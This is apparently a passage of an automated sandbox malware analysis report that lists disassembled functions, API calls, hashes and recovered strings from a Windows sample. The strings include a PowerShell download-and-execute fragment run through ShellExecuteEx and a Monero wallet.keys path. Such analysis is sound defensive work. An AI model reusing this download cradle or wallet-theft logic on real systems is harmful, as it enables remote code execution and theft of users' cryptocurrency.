                          • Opcode ID: 5440d8bed88897a06b2fdfd8333e46e7bd633eb589d5eb386dd924c1cdcd6a1c
                          • Instruction ID: ed625653c53c1cd4ea091483d6e8935dedda28fb2d99f8984d37d93e05ec3523
                          • Opcode Fuzzy Hash: 5440d8bed88897a06b2fdfd8333e46e7bd633eb589d5eb386dd924c1cdcd6a1c
                          • Instruction Fuzzy Hash: A63152B29002085BCB14FBA0DC8AFFA7378AB58700F444599F719A6091EEB4978DDB95
                          Function 00CC2C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                            • Part of subcall function 00CCA9B0: lstrlen.KERNEL32(?,01899C80,?,\Monero\wallet.keys,00CD0E17), ref: 00CCA9C5
                            • Part of subcall function 00CCA9B0: lstrcpy.KERNEL32(00000000), ref: 00CCAA04
                            • Part of subcall function 00CCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CCAA12
                            • Part of subcall function 00CCA920: lstrcpy.KERNEL32(00000000,?), ref: 00CCA972
                            • Part of subcall function 00CCA920: lstrcat.KERNEL32(00000000), ref: 00CCA982
                            • Part of subcall function 00CCA8A0: lstrcpy.KERNEL32(?,00CD0E17), ref: 00CCA905
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00CC2D85
                          Strings
                          • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00CC2CC4
                          • ')", xrefs: 00CC2CB3
                          • <, xrefs: 00CC2D39
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00CC2D04
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                          • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          • API String ID: 3031569214-898575020
                          • Opcode ID: 729f6934da46ff17cf62e678059661bb4e269cd6e82acdb7b0159d348fbbe2bd
                          • Instruction ID: ab3420beb3855e6f726ef401b5ee1919fc97865a3bbdc472fa12a2305b4cc24c
                          • Opcode Fuzzy Hash: 729f6934da46ff17cf62e678059661bb4e269cd6e82acdb7b0159d348fbbe2bd
                          • Instruction Fuzzy Hash: 1541EA71C1020C9BDB14EBA1C89AFEDBB74AF10304F50412DE116AA1D2EF742A4AEF91
                          Function 00CB9E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                          Download Yara Rule
                          APIs
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00CB9F41
                            • Part of subcall function 00CCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CCA7E6
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$AllocLocal
                          • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                          • API String ID: 4171519190-1096346117
                          • Opcode ID: 5279d02e904f8ed28032fd9f8f6af5af9d2844cf04b728e2f81b63066f02e6af
                          • Instruction ID: fb93c0b93834a7f9e0c8c6a4adf7160f698cdcb3755916ca7a0dd3eb67bafc28
                          • Opcode Fuzzy Hash: 5279d02e904f8ed28032fd9f8f6af5af9d2844cf04b728e2f81b63066f02e6af
                          • Instruction Fuzzy Hash: 94613D71A0024CAFDB24EFA4DC9AFED77B5AF44304F448018F90A5F291DB746A06DB52
                          Function 00CC40B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                          Download Yara Rule
                          APIs
                          • RegOpenKeyExA.ADVAPI32(80000001,0189D808,00000000,00020119,?), ref: 00CC40F4
                          • RegQueryValueExA.ADVAPI32(?,0189E2D0,00000000,00000000,00000000,000000FF), ref: 00CC4118
                          • RegCloseKey.ADVAPI32(?), ref: 00CC4122
                          • lstrcat.KERNEL32(?,00000000), ref: 00CC4147
                          • lstrcat.KERNEL32(?,0189E2E8), ref: 00CC415B
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$CloseOpenQueryValue
                          • String ID:
                          • API String ID: 690832082-0
                          • Opcode ID: 767c3bb4ca90fa28714ce9f65801dc08ce4d12736a17d9e9f7af5629b7890ef5
                          • Instruction ID: 20241415aa42e4c60ff72ac01163c442ed8dadacd5146afd97107726d6843701
                          • Opcode Fuzzy Hash: 767c3bb4ca90fa28714ce9f65801dc08ce4d12736a17d9e9f7af5629b7890ef5
                          • Instruction Fuzzy Hash: 2A418AF69001086BDB24EBA0EC56FFE777DA788300F44855CB6195B181EA755B8CCBA2
                          Function 00CC6920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                          Download Yara Rule
                          APIs
                          • GetSystemTime.KERNEL32(?), ref: 00CC696C
                          • sscanf.NTDLL ref: 00CC6999
                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00CC69B2
                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00CC69C0
                          • ExitProcess.KERNEL32 ref: 00CC69DA
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Time$System$File$ExitProcesssscanf
                          • String ID:
                          • API String ID: 2533653975-0
                          • Opcode ID: 24fda212ddde58466cfb9ae282295da630c5ece577d9365c09871d90da02fcdc
                          • Instruction ID: d2023cdb5045a0997a0b1d6b9ef8e4f39ec3887a9719ffc6705f0204a1a624dd
                          • Opcode Fuzzy Hash: 24fda212ddde58466cfb9ae282295da630c5ece577d9365c09871d90da02fcdc
                          • Instruction Fuzzy Hash: 0D21ECB5D00208AFCF08EFE5D949AEEB7B5BF48300F04852EE41AB7250EB745609CB65
                          Function 00CC7E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00CC7E37
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00CC7E3E
                          • RegOpenKeyExA.ADVAPI32(80000002,0188BD78,00000000,00020119,?), ref: 00CC7E5E
                          • RegQueryValueExA.ADVAPI32(?,0189D5C8,00000000,00000000,000000FF,000000FF), ref: 00CC7E7F
                          • RegCloseKey.ADVAPI32(?), ref: 00CC7E92
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID:
                          • API String ID: 3225020163-0
                          • Opcode ID: 9f07109f34cfb0818b4ceb01bc94f344472650eae91465b4713cc3928bf4f279
                          • Instruction ID: 02de1206f44c0a2154367ee95c94cd41506dbb0e4ce345a0014016ec24ab59cc
                          • Opcode Fuzzy Hash: 9f07109f34cfb0818b4ceb01bc94f344472650eae91465b4713cc3928bf4f279
                          • Instruction Fuzzy Hash: 97116DF2A44205AFD704DB96DC49F7BBBB8EB44710F10426DF619AB280D7B45804CBA1
                          Function 00CC9260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                          Download Yara Rule
                          APIs
                          • StrStrA.SHLWAPI(0189E1B0,?,?,?,00CC140C,?,0189E1B0,00000000), ref: 00CC926C
                          • lstrcpyn.KERNEL32(00EFAB88,0189E1B0,0189E1B0,?,00CC140C,?,0189E1B0), ref: 00CC9290
                          • lstrlen.KERNEL32(?,?,00CC140C,?,0189E1B0), ref: 00CC92A7
                          • wsprintfA.USER32 ref: 00CC92C7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpynlstrlenwsprintf
                          • String ID: %s%s
                          • API String ID: 1206339513-3252725368
                          • Opcode ID: 698de9d73fe03e4bc971020ba7bf34f6967b69c8f0625137f1fac441dc2f6ac1
                          • Instruction ID: ef5d785badd4e217e6b6f24a48f37584ee97b4c5d52ab68ec606940b097a11ec
                          • Opcode Fuzzy Hash: 698de9d73fe03e4bc971020ba7bf34f6967b69c8f0625137f1fac441dc2f6ac1
                          • Instruction Fuzzy Hash: 9401E9B5500108FFCB04DFEDC988EAE7BB9EB84350F148158F909AB244C631AB41DB91
                          Function 00CB12A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00CB12B4
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00CB12BB
                          • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00CB12D7
                          • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00CB12F5
                          • RegCloseKey.ADVAPI32(?), ref: 00CB12FF
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID:
                          • API String ID: 3225020163-0
                          • Opcode ID: 815968efa061220fac865d38c92941f61414d7311bd8198175547c83584e1627
                          • Instruction ID: e5faa113a4db56ab4282881d052c602f9c3abd524e35bf0c3ef798450c37a036
                          • Opcode Fuzzy Hash: 815968efa061220fac865d38c92941f61414d7311bd8198175547c83584e1627
                          • Instruction Fuzzy Hash: A60136F9A40208BFDB04DFD1DC49FAEB7B8EB88701F048155FA09AB280D670AA05CF51
                          Function 00CCC84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: String___crt$Type
                          • String ID:
                          • API String ID: 2109742289-3916222277
                          • Opcode ID: 13f8afa66d5274b5de3c22d30a4984fc5b0150c05463db0c0e24feba42409f50
                          • Instruction ID: 496bc8ba08309ff283f93ad2ab8174f552a1c77c23c10d0edb4a08c34ffa0d8b
                          • Opcode Fuzzy Hash: 13f8afa66d5274b5de3c22d30a4984fc5b0150c05463db0c0e24feba42409f50
                          • Instruction Fuzzy Hash: B341B2B150079C9EDB218B24CDC5FFBBBE8AB45704F1844ECE99A86182E2719B45DF60
                          Function 00CC6630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                          Download Yara Rule
                          APIs
                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00CC6663
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                            • Part of subcall function 00CCA9B0: lstrlen.KERNEL32(?,01899C80,?,\Monero\wallet.keys,00CD0E17), ref: 00CCA9C5
                            • Part of subcall function 00CCA9B0: lstrcpy.KERNEL32(00000000), ref: 00CCAA04
                            • Part of subcall function 00CCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00CCAA12
                            • Part of subcall function 00CCA8A0: lstrcpy.KERNEL32(?,00CD0E17), ref: 00CCA905
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00CC6726
                          • ExitProcess.KERNEL32 ref: 00CC6755
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                          • String ID: <
                          • API String ID: 1148417306-4251816714
                          • Opcode ID: a3a9d88fbef733cc3ec5281c4356f6ff8cbcd7904d79ee09d1b4698f26089aac
                          • Instruction ID: 80846992026d7cc51afca9c6af60539065feb933ab72ed70a4ad9ebf778ecf7b
                          • Opcode Fuzzy Hash: a3a9d88fbef733cc3ec5281c4356f6ff8cbcd7904d79ee09d1b4698f26089aac
                          • Instruction Fuzzy Hash: 983138B1801208AFDB14EB91DC86FEEB778AF44304F404199F20976191DF746B49DF6A
                          Function 00CC87C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00CD0E28,00000000,?), ref: 00CC882F
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00CC8836
                          • wsprintfA.USER32 ref: 00CC8850
                            • Part of subcall function 00CCA740: lstrcpy.KERNEL32(00CD0E17,00000000), ref: 00CCA788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcesslstrcpywsprintf
                          • String ID: %dx%d
                          • API String ID: 1695172769-2206825331
                          • Opcode ID: aa03cc755037dccd757166d8fa3d9e19ed8bf44579631f2dd77b28059a0d9ca9
                          • Instruction ID: d9548ee78ae505c65be0758074ea550fd85f4e3ad9f0781a6fa97a3fc40fab16
